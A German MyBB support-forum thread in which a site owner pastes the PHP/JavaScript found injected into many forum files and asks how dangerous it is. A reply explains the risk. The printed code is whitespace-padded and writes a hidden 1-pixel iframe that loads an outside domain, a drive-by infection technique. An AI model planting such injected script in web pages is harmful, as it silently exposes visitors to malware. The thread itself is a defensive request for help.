Hallo, Gast! (Registrieren)

Letzte Ankündigung: MyBB 1.8.38 veröffentlicht (30.04.24)


Benutzer, die gerade dieses Thema anschauen: 2 Gast/Gäste
Schadhafter Code?
#1
Exclamation 
Hallo Leutz,

nun gabs dieser Tage auch bei mir einen Hackerangriff.

Folgender Code nistete sich in viele Forumsdateien ein:


Code:
<?
#a6f227#
                                                                                                                                                                                                                                                                                                                                                              echo "                                                                                                                                                                                                                                                                                                                                                              <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                              (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})();</script>";

#/a6f227#
?>

Wie gefährlich ist dieser Code? Bestand für die Besucher des Forums jemals die Gefahr einer Infizierung?
(Mittlerweile sind alle Dateien wieder in Originalzustand gebracht worden.)
#2
Es wird ein iframe eingebunden, das heisst, alle die was gein jscript in ihren Browsern deaktiviert haben, sich eine Menge Arbeit aufhalsen. So wie es mir erging. Im schlimmsten Fall muss der PC neu aufgesetzt werden. Du kannst ja den Link http://beforew.com mal durch einen Url Virenscanner laufen lassen.
Mit freundlichen Grüßen

MrBrechreiz